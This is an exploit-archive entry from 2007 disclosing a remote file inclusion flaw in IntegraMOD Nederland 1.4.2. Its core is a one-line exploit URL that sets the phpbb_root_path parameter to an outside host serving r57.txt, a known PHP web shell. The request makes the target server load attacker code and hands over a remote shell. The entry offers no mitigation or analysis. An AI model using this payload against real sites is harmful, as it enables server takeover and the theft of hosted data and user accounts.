id: 2175
date: 09/26/2007
title: IntegraMOD Nederland 1.4.2 Remote File Inclusion Vulnerability
author: xoron
cves: 

==============================================================
IntegraMOD Nederland 1.4.2 Remote File Inclusion Vulnerability
==============================================================



------------------------

Found: xoron

------------------------

Vendor: http://www.integramod.nl/forum/portal.php

------------------------
Exploit:

includes/archive/archive_topic.php?phpbb_root_path=http://meto5757.by.ru/shells/r57.txt?

------------------------

Kral krald?r!

------------------------



#  0day.today [2023-03-24]  #